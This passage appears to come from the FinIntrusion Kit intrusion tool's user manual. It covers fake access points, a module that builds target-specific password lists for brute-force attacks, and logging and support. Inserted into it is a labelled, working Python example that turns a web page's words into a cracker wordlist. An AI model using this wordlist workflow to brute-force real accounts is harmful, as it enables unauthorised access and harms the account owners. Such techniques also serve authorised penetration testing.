Press the button to stop the Fake AP and Monitor function.
9 PASSWORD GENERATOR UTILS
The "Website Profiling" module can be used to crawl a website, extract all words and export them as a password list. Such a specific password list can speed up a brute-force attack against a well-known target (e.g. a web-based forum, e-mail account, etc.).
[Figure: Example of a "Wordlist" generated from the web page "www.finfisher.com"]
Work flow:
1. A web crawler is started. The crawler mirrors at most 500 different web pages from a web server and saves them in the "/tmp" directory.
2. A web parser extracts all words and saves them to a text file: "/tmp/WEBSITE.txt"
3. All words are imported into the GUI and duplicates are removed.
Note: Words longer than 33 characters are ignored.
9.1 Limitations
The "Website Profiling" module has some limitations:
Only web pages in HTML are supported. Other source code (e.g. ASP, JS) can generate unusable words (e.g. method or variable names).
Only web pages without pre-authentication, session cookies, etc. can be analyzed.
No proxy authentication is supported.
The wordlist must be cleaned up manually (remove nonsense / unlikely words such as method or variable names, etc.).
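The following is an added example and not the FinIntrusion Kit's own crawler; it covers the parse step of the "Website Profiling" workflow (section 9) and the first limitation above. The crawl step (mirroring up to 500 pages into /tmp) is left out. Over a constructed HTML page it extracts words, drops everything inside script and style elements (so JS method and variable names do not end up in the list, which is the clean-up the limitations section otherwise leaves to the operator), discards words longer than 33 characters, and removes duplicates while keeping first-seen order. The domain, names and addresses in the sample page are made up; the min_len option is an addition of this example, not a setting of the kit.

```python
"""Build a target-specific wordlist from a web page's visible text.

Added example, not code from the FinIntrusion Kit. The sample page is constructed.
"""
import re
from html.parser import HTMLParser

MAX_WORD_LEN = 33   # the manual's limit


class _TextCollector(HTMLParser):
    """Collects text nodes, ignoring everything inside <script> and <style>."""

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.chunks.append(data)


def extract_words(html, max_len=MAX_WORD_LEN, min_len=1):
    """Unique words (first-seen order, case preserved) from the visible text of one page."""
    parser = _TextCollector()
    parser.feed(html)
    parser.close()
    seen, words = set(), []
    for token in re.findall(r"[A-Za-z0-9]+", " ".join(parser.chunks)):
        if min_len <= len(token) <= max_len and token not in seen:
            seen.add(token)
            words.append(token)
    return words


def write_wordlist(words, path):
    """One word per line, the format a cracker's wordlist option expects."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


# Constructed sample page (company, addresses and build id are made up).
SAMPLE_HTML = """<html><head><title>Example Corp Support Portal</title>
<script>var sessionToken = "abc"; function refreshNav() {}</script>
<style>.nav { color: red }</style></head>
<body><h1>Welcome to Example Corp</h1>
<p>Contact: support@example.test, tel +49-89-123</p>
<p>Products: Widget, WidgetPro, WidgetEnterprise. Welcome again to the portal.</p>
<p>Build id: aaaaaaaaaabbbbbbbbbbccccccccccddddddddddeeee</p>
</body></html>"""

if __name__ == "__main__":
    for w in extract_words(SAMPLE_HTML):
        print(w)
```

The 44-character build id and the script identifiers sessionToken and refreshNav are absent from the output; product names, contact details and the numbers in a phone number survive, which is exactly the kind of site-specific material a generic wordlist lacks.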
10 FININTRUSION KIT – OTHER OPTIONS
FinIntrusion Kit provides some additional functions, which are available when a dedicated target PC or user credential is selected. Select a row (left mouse button) and press the right mouse button to get a submenu.
[Figure: Submenu of "Network Scan" and submenu of "Wireless Scan"]
10.1.1 Delete / Delete all
Delete the selected row or all entries in the list.
10.1.2 Data Export
Save all data, tab-separated, into an external text file. This file can be analyzed e.g. with Excel.
[Figure: Example of a target list loaded in Excel]
11 ACTIVITY LOG
For legal reasons, FinIntrusion Kit records all actions that have been executed, with a time stamp. The action log can be exported into a regular TXT / CSV file.
[Figure: Example of a wireless Activity Log]
12 SUPPORT
All customers have access to an after-sales website that gives them the following capabilities:
Download product information (latest user manuals, specifications, training slides)
Access change-log and roadmap for products
Report bugs and submit feature requests
Inspect frequently asked questions (FAQ)
The after-sales website can be found at
https://www.gamma-international.de
Username:
Password: